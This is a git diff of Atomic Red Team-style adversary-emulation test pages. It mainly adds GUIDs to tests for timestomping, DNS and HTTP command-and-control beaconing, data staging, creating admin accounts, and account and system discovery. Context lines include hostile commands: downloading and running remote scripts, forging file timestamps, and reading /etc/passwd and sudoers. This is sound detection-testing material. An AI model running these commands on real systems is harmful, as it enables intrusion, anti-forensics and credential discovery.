b/atomics/T1070.005/T1070.005.md index ca630c36..f784ce96 100644 --- a/atomics/T1070.005/T1070.005.md +++ b/atomics/T1070.005/T1070.005.md @@ -14,15 +14,17 @@
## Atomic Test #1 - Add Network Share -Add a Network Share utilizing the command_prompt +auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 + +Add a Network Share utilizing the command_prompt **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Share to add. | string | \\test\share| @@ -44,15 +46,17 @@ net share test=#{share_name} /REMARK:"test share" /CACHE:No
## Atomic Test #2 - Remove Network Share -Removes a Network Share utilizing the command_prompt +auto_generated_guid: 09210ad5-1ef2-4077-9ad3-7351e13e9222 + +Removes a Network Share utilizing the command_prompt **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Share to remove. | string | \\test\share| @@ -73,15 +77,17 @@ net share #{share_name} /delete
## Atomic Test #3 - Remove Network Share PowerShell -Removes a Network Share utilizing PowerShell +auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 + +Removes a Network Share utilizing PowerShell **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Share to remove. | string | \\test\share| diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md index 224f3a98..11fb1413 100644 --- a/atomics/T1070.006/T1070.006.md +++ b/atomics/T1070.006/T1070.006.md @@ -26,15 +26,17 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
## Atomic Test #1 - Set a file's access timestamp -Stomps on the access timestamp of a file +auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 + +Stomps on the access timestamp of a file **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| @@ -55,15 +57,17 @@ touch -a -t 197001010000.00 #{target_filename}
## Atomic Test #2 - Set a file's modification timestamp -Stomps on the modification timestamp of a file +auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 + +Stomps on the modification timestamp of a file **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| @@ -84,18 +88,20 @@ touch -m -t 197001010000.00 #{target_filename}
## Atomic Test #3 - Set a file's creation timestamp + +auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b + Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| @@ -120,17 +126,19 @@ stat #{target_filename}
## Atomic Test #4 - Modify file timestamps using reference file + +auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 + Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_file_path | Path of file to modify timestamps of | Path | /opt/filename| | reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh| @@ -152,16 +160,18 @@ touch -acmr #{reference_file_path} #{target_file_path}
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell + +auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c + Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | file_path | Path of file to change creation timestamp | Path | $env:TEMP\T1551.006_timestomp.txt| @@ -185,7 +195,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore ##### Description: A file must exist at the path (#{file_path}) to change the creation time on ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}) {exit 0} else {exit 1} +if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -200,16 +210,18 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell + +auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 + Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | file_path | Path of file to change modified timestamp | Path | $env:TEMP\T1551.006_timestomp.txt| @@ -233,7 +245,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore ##### Description: A file must exist at the path (#{file_path}) to change the modified time on ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}) {exit 0} else {exit 1} +if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -248,16 +260,18 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell + +auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 + Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | file_path | Path of file to change last access timestamp | Path | $env:TEMP\T1551.006_timestomp.txt| @@ -281,7 +295,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore ##### Description: A file must exist at the path (#{file_path}) to change the last access time on ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}) {exit 0} else {exit 1} +if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -296,19 +310,21 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #8 - Windows - Timestomp a File + +auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 + Timestomp kxwn.lock. Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | File path for timestomp payload | String | $env:appdata\Microsoft| @@ -333,7 +349,7 @@ Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore ##### Description: timestomp.ps1 must be present in #{file_path}. ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} +if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -342,7 +358,7 @@ Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal ##### Description: kxwn.lock must be present in #{file_path}. ##### Check Prereq Commands: ```powershell -if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} +if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 92588a46..159510d9 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -12,9 +12,11 @@ These actions may interfere with event collection, reporting, or other notificat
## Atomic Test #1 - Indicator Removal using FSUtil + +auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435 + Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn - **Supported Platforms:** Windows diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md index f1ba954c..58a4fe43 100644 --- a/atomics/T1071.001/T1071.001.md +++ b/atomics/T1071.001/T1071.001.md @@ -16,18 +16,20 @@ Protocols such as HTTP and HTTPS that carry web traffic may be very common in en
## Atomic Test #1 - Malicious User Agents - Powershell + +auto_generated_guid: 81c13829-f6c9-45b8-85a6-053366d55297 + This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| @@ -51,18 +53,20 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
## Atomic Test #2 - Malicious User Agents - CMD + +auto_generated_guid: dc3488b0-08c7-4fea-b585-905c83b48180 + This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| | curl_path | path to curl.exe | path | C:\Windows\System32\Curl.exe| @@ -85,7 +89,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m ##### Description: Curl must be installed on system ##### Check Prereq Commands: ```powershell -if (Test-Path #{curl_path}) {exit 0} else {exit 1} +if (Test-Path #{curl_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -103,16 +107,18 @@ Remove-Item $env:temp\curl.zip
## Atomic Test #3 - Malicious User Agents - Nix + +auto_generated_guid: 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 + This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| diff --git a/atomics/T1071.004/T1071.004.md b/atomics/T1071.004/T1071.004.md index 22de47a9..17f935e4 100644 --- a/atomics/T1071.004/T1071.004.md +++ b/atomics/T1071.004/T1071.004.md @@ -18,17 +18,19 @@ The DNS protocol serves an administrative function in computer networking and th
## Atomic Test #1 - DNS Large Query Volume + +auto_generated_guid: 1700f5d6-5a44-487b-84de-bc66f507b0a6 + This test simulates an infected host sending a large volume of DNS queries to a command and control server. The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | query_type | DNS query type | string | TXT| | subdomain | Subdomain prepended to the domain name | string | atomicredteam| @@ -52,17 +54,19 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #2 - DNS Regular Beaconing + +auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 + This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | runtime | Time in minutes to run the simulation | integer | 30| | domain | Default domain to simulate against | string | 127.0.0.1.xip.io| @@ -89,17 +93,19 @@ Set-Location PathToAtomicsFolder
## Atomic Test #3 - DNS Long Domain Query + +auto_generated_guid: fef31710-223a-40ee-8462-a396d6b66978 + This test simulates an infected host returning data to a command and control server using long domain names. The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. Upon execution, DNS information about the domain will be displayed for each callout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | query_type | DNS query type | string | TXT| | subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte| @@ -123,20 +129,22 @@ Set-Location PathToAtomicsFolder
## Atomic Test #4 - DNS C2 + +auto_generated_guid: e7bf9802-2e78-4db9-93b5-181b7bcd37d7 + This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com| | server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1| diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md index 346ab27a..7148ce67 100644 --- a/atomics/T1072/T1072.md +++ b/atomics/T1072/T1072.md @@ -14,15 +14,17 @@ The permissions required for this action vary by system configuration; local cre
## Atomic Test #1 - Radmin Viewer Utility -An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. +auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 + +An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | radmin_installer | Radmin Viewer installer | Path | %TEMP%\RadminViewer.msi| | radmin_exe | The radmin.exe executable from RadminViewer.msi | Path | %PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe| @@ -42,7 +44,7 @@ An adversary may use Radmin Viewer Utility to remotely control Windows device, t ##### Description: Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) ##### Check Prereq Commands: ```cmd -if not exist "#{radmin_exe}" (exit /b 1) +if not exist "#{radmin_exe}" (exit /b 1) ``` ##### Get Prereq Commands: ```cmd diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md index 87f04803..99d5bd9a 100644 --- a/atomics/T1074.001/T1074.001.md +++ b/atomics/T1074.001/T1074.001.md @@ -14,16 +14,18 @@
## Atomic Test #1 - Stage data from Discovery.bat + +auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f + Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat| @@ -48,15 +50,17 @@ Remove-Item -Force #{output_file} -ErrorAction Ignore
## Atomic Test #2 - Stage data from Discovery.sh -Utilize curl to download discovery.sh and execute a basic information gathering shell script +auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 + +Utilize curl to download discovery.sh and execute a basic information gathering shell script **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074.001_discovery.log| @@ -77,16 +81,18 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp + +auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a + Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip| | input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074.001\bin\Folder_to_zip| diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index 4ed80952..3f1b6291 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -12,16 +12,18 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges + +auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | guest_user | Specify the guest account | String | guest| | guest_password | Specify the guest password | String | Password123!| diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index 36d3713c..88b2cf6e 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -12,8 +12,10 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
## Atomic Test #1 - Create local account with admin priviliges -After execution the new account will be active and added to the Administrators group +auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + +After execution the new account will be active and added to the Administrators group **Supported Platforms:** Windows diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 7c4d1d40..579b4cce 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -34,8 +34,10 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
## Atomic Test #1 - System Information Discovery -Identify System Info. Upon execution, system info and time info will be displayed. +auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667 + +Identify System Info. Upon execution, system info and time info will be displayed. **Supported Platforms:** Windows @@ -59,8 +61,10 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
## Atomic Test #2 - System Information Discovery -Identify System Info +auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 + +Identify System Info **Supported Platforms:** macOS @@ -84,15 +88,17 @@ ls -al /Applications
## Atomic Test #3 - List OS Information -Identify System Info +auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c + +Identify System Info **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file used to store the results. | path | /tmp/T1082.txt| @@ -122,8 +128,10 @@ rm #{output_file} 2>/dev/null
## Atomic Test #4 - Linux VM Check via Hardware -Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. +auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec + +Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. **Supported Platforms:** Linux @@ -153,8 +161,10 @@ if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
## Atomic Test #5 - Linux VM Check via Kernel Modules -Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. +auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e + +Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. **Supported Platforms:** Linux @@ -181,8 +191,10 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
## Atomic Test #6 - Hostname Discovery (Windows) -Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. +auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f + +Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. **Supported Platforms:** Windows @@ -205,8 +217,10 @@ hostname
## Atomic Test #7 - Hostname Discovery -Identify system hostname for Linux and macOS systems. +auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 + +Identify system hostname for Linux and macOS systems. **Supported Platforms:** Linux, macOS @@ -229,8 +243,10 @@ hostname
## Atomic Test #8 - Windows MachineGUID Discovery -Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. +auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 + +Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. **Supported Platforms:** Windows @@ -253,18 +269,20 @@ REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
## Atomic Test #9 - Griffon Recon + +auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 + Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool. This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), and it gives the exact same recon behavior as the original (minus the C2 interaction). For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | vbscript | Path to sample script | String | PathToAtomicsFolder\T1082\src\griffon_recon.vbs| @@ -285,8 +303,10 @@ cscript #{vbscript}
## Atomic Test #10 - Environment variables discovery on windows -Identify all environment variables. Upon execution, environments variables and your path info will be displayed. +auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 + +Identify all environment variables. Upon execution, environments variables and your path info will be displayed. **Supported Platforms:** Windows @@ -309,8 +329,10 @@ set
## Atomic Test #11 - Environment variables discovery on macos and linux -Identify all environment variables. Upon execution, environments variables and your path info will be displayed. +auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 + +Identify all environment variables. Upon execution, environments variables and your path info will be displayed. **Supported Platforms:** macOS, Linux diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index a50dbcfe..7bd81b17 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -18,9 +18,11 @@ Many command shell utilities can be used to obtain this information. Examples in
## Atomic Test #1 - File and Directory Discovery (cmd.exe) + +auto_generated_guid: 0e36303b-6762-4500-b003-127743b80ba6 + Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of all of the data discovery commands. - **Supported Platforms:** Windows @@ -49,8 +51,10 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell) -Find or discover files on the file system. Upon execution, file and folder information will be displayed. +auto_generated_guid: 2158908e-b7ef-4c21-8a83-3ce4dd05a924 + +Find or discover files on the file system. Upon execution, file and folder information will be displayed. **Supported Platforms:** Windows @@ -75,6 +79,9 @@ gci -recurse
## Atomic Test #3 - Nix File and Diectory Discovery + +auto_generated_guid: ffc8b249-372a-4b74-adcd-e4c0430842de + Find or discover files on the file system References: @@ -82,14 +89,13 @@ References: http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/ - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file used to store the results. | path | /tmp/T1083.txt| @@ -121,15 +127,17 @@ rm #{output_file}
## Atomic Test #4 - Nix File and Directory Discovery 2 -Find or discover files on the file system +auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e + +Find or discover files on the file system **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file used to store the results. | path | /tmp/T1083.txt| diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index de48610e..98eebaf4 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -32,15 +32,17 @@ Commands such as net user and net localgroup of the [N
## Atomic Test #1 - Enumerate all accounts (Local) -Enumerate all accounts by copying /etc/passwd to another file +auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f + +Enumerate all accounts by copying /etc/passwd to another file **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt| @@ -66,15 +68,17 @@ rm -f #{output_file}
## Atomic Test #2 - View sudoers access -(requires root) +auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 + +(requires root) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt| @@ -100,15 +104,17 @@ rm -f #{output_file}
## Atomic Test #3 - View accounts with UID 0 -View accounts with UID 0 +auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 + +View accounts with UID 0 **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt| @@ -134,8 +140,10 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List opened files by user -List opened files by user +auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb + +List opened files by user **Supported Platforms:** Linux, macOS @@ -158,15 +166,17 @@ username=$(id -u -n) && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely -Show if a user account has ever logged in remotely +auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 + +Show if a user account has ever logged in remotely **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt| @@ -190,7 +200,7 @@ rm -f #{output_file} ##### Description: Check if lastlog command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; +if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; ``` ##### Get Prereq Commands: ```sh @@ -204,8 +214,10 @@ echo "Install lastlog on the machine to run the test."; exit 1;
## Atomic Test #6 - Enumerate users and groups -Utilize groups and id to enumerate users and groups +auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e + +Utilize groups and id to enumerate users and groups **Supported Platforms:** Linux, macOS @@ -229,8 +241,10 @@ id
## Atomic Test #7 - Enumerate users and groups -Utilize local utilities to enumerate users and groups +auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 + +Utilize local utilities to enumerate users and groups **Supported Platforms:** macOS @@ -257,9 +271,11 @@ dscacheutil -q user
## Atomic Test #8 - Enumerate all accounts on Windows (Local) + +auto_generated_guid: 80887bec-5a9b-4efc-a81d-f83eb2eb32ab + Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session - **Supported Platforms:** Windows @@ -286,8 +302,10 @@ net localgroup
## Atomic Test #9 - Enumerate all accounts via PowerShell (Local) -Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. +auto_generated_guid: ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b + +Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. **Supported Platforms:** Windows @@ -318,8 +336,10 @@ net localgroup
## Atomic Test #10 - Enumerate logged on users via CMD (Local) -Enumerate logged on users. Upon exeuction, logged on users will be displayed. +auto_generated_guid: a138085e-bfe5-46ba-a242-74a6fb884af3 + +Enumerate logged on users. Upon exeuction, logged on users will be displayed. **Supported Platforms:** Windows @@ -342,8 +362,10 @@ query user
## Atomic Test #11 - Enumerate logged on users via PowerShell -Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. +auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03 + +Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index f39060c1..8949d5be 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -30,9 +30,11 @@ Commands such as net user /domain and net group /domain ## Atomic Test #1 - Enumerate all accounts (Domain) + +auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e + Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session - **Supported Platforms:** Windows @@ -56,8 +58,10 @@ net group /domain
